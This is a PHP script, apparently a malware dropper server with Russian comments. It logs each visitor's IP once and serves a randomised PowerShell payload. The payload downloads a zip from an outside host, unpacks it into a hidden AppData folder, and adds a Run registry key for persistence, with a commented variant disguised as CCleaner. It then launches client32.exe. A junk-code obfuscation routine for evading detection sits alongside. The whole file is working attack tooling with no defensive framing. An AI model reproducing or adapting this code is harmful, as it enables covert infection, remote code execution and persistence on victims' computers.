Your IP : 216.73.216.1
<?php
error_reporting(0);
$antivm = "25";
$urltoload = "https://www.agenciacrabli.com/yszs.zip?lap=".mt_rand(500, 7000).""; // веб адресс на наш дроппер, для скачивания/запуска файлов.
function rand_name(){
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$randomString = '';
$length = rand(5,25);
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, strlen($characters) - 1)];
}
return $randomString;
}
function trash(){ // функция замусоривания кода
$characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$randomString = '';
//$length = rand(1,2); // для теста
$length = rand(5000,8000); // 30 ~ мегабайт
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, strlen($characters) - 1)];
}
return $randomString;
}
/* NO TRASHING CCODE
function random_explode($string){
$size = strlen($string)-1;
$i = 0;
while($i<=$size){
$rchars = rand(1, $size-$i);
$p[] = substr($string, $i, $rchars);
$i = $i+$rchars;
}
$result = '"';
$result .= implode('"+"',$p);
$result .= '"';
return $result;
}
*/
// TRASHING CODE
function random_explode($string){ // функция explode для переменных
$size = strlen($string)-1;
$i = 0;
while($i<=$size){
$rchars = rand(1, $size-$i);
$p[] = substr($string, $i, $rchars);
$i = $i+$rchars;
}
$result = '/* '.trash().''.trash().' */"';
$result .= implode('" /*'.trash().' '.trash().' */
+
/* '.trash().''.trash().' */"',$p);
$result .= '"/* '.trash().''.trash().' */';
return $result;
}
define('LOG_FILE_PATH', 'count.txt');
function getClientIP() {
$ip_keys = ['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'];
foreach ($ip_keys as $key) {
if (!empty($_SERVER[$key])) {
foreach (explode(',', $_SERVER[$key]) as $ip) {
$ip = trim($ip);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
return $ip;
}
}
}
}
return 'UNKNOWN';
}
$ip = getClientIP();
$ips = file_exists(LOG_FILE_PATH) ? file(LOG_FILE_PATH, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
if (!in_array($ip, $ips)) {
file_put_contents(LOG_FILE_PATH, $ip . "\n", FILE_APPEND);
} else {
exit;
}
$var01 = rand_name();
$var02 = rand_name();
$var03 = rand_name();
$var04 = rand_name();
$var05 = rand_name();
$var06 = rand_name();
$var07 = rand_name();
$var08 = rand_name();
$var09 = rand_name();
$var10 = rand_name();
$var11 = rand_name();
$var12 = rand_name();
$var13 = rand_name();
$var14 = rand_name();
$var15= rand_name();
$var16 = rand_name();
$code_header .= '$' . $var01 . ' = "' . $urltoload . '"' . "\n";
$code_header .= '$' . $var02 . ' = (New-Object System.Net.WebClient).DownloadData($' . $var01 . ')' . "\n";
$code_header .= '$dffgds = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | ForEach-Object {[char]$_})' . "\n";
$code_header .= '$' . $var04 . ' = "$env:APPDATA\WinMedia\$dffgds"' . "\n";
$code_header .= 'if (-not (Test-Path $' . $var04 . ')) {' . "\n";
$code_header .= ' New-Item -Path $' . $var04 . ' -ItemType Directory -Force | Out-Null' . "\n";
$code_header .= '}' . "\n";
$code_header .= '$' . $var05 . ' = New-Object System.IO.MemoryStream' . "\n";
$code_header .= '$' . $var05 . '.Write($' . $var02 . ', 0, $' . $var02 . '.Length)' . "\n";
$code_header .= '$' . $var05 . '.Position = 0' . "\n";
$code_header .= 'Add-Type -AssemblyName System.IO.Compression' . "\n";
$code_header .= '$' . $var06 . ' = New-Object System.IO.Compression.ZipArchive($' . $var05 . ', [System.IO.Compression.ZipArchiveMode]::Read)' . "\n";
$code_header .= 'foreach ($' . $var07 . ' in $' . $var06 . '.Entries) {' . "\n";
$code_header .= ' $' . $var08 . ' = Join-Path $' . $var04 . ' $' . $var07 . '.FullName' . "\n";
$code_header .= ' $' . $var09 . ' = Split-Path $' . $var08 . ' -Parent' . "\n";
$code_header .= ' if (-not (Test-Path $' . $var09 . ')) {' . "\n";
$code_header .= ' New-Item -Path $' . $var09 . ' -ItemType Directory -Force | Out-Null' . "\n";
$code_header .= ' }' . "\n";
$code_header .= ' if ($' . $var07 . '.Length -gt 0) {' . "\n";
$code_header .= ' $' . $var12 . ' = $' . $var07 . '.Open()' . "\n";
$code_header .= ' $' . $var13 . ' = [System.IO.File]::Create($' . $var08 . ')' . "\n";
$code_header .= ' $' . $var12 . '.CopyTo($' . $var13 . ')' . "\n";
$code_header .= ' $' . $var13 . '.Close()' . "\n";
$code_header .= ' $' . $var12 . '.Close()' . "\n";
$code_header .= ' }' . "\n";
$code_header .= '}' . "\n";
$code_header .= '$' . $var06 . '.Dispose()' . "\n";
$code_header .= '$' . $var05 . '.Dispose()' . "\n";
$code_header .= '$' . $var14 . ' = "$' . $var04 . '\client32.exe"' . "\n";
//$code_header .= "Register-ScheduledTask -TaskName 'MyAutoRunTask' -Action (New-ScheduledTaskAction -Execute $" . $var14 . ") -Trigger (New-ScheduledTaskTrigger -AtStartup) -Principal (New-ScheduledTaskPrincipal -UserId 'SYSTEM' -RunLevel Highest) -Force" . "\n";
$code_header .= 'sp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run WindowApplication1 $' . $var14 . "\n";
$code_header .= 'Start-Process $' . $var14 . "\n";
header('Content-Type: text/plain; charset=utf-8');
echo $code_header;
/*
$code_header .= 'sp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run CCleaner1 $' . $var14 . "\n";
*/
?>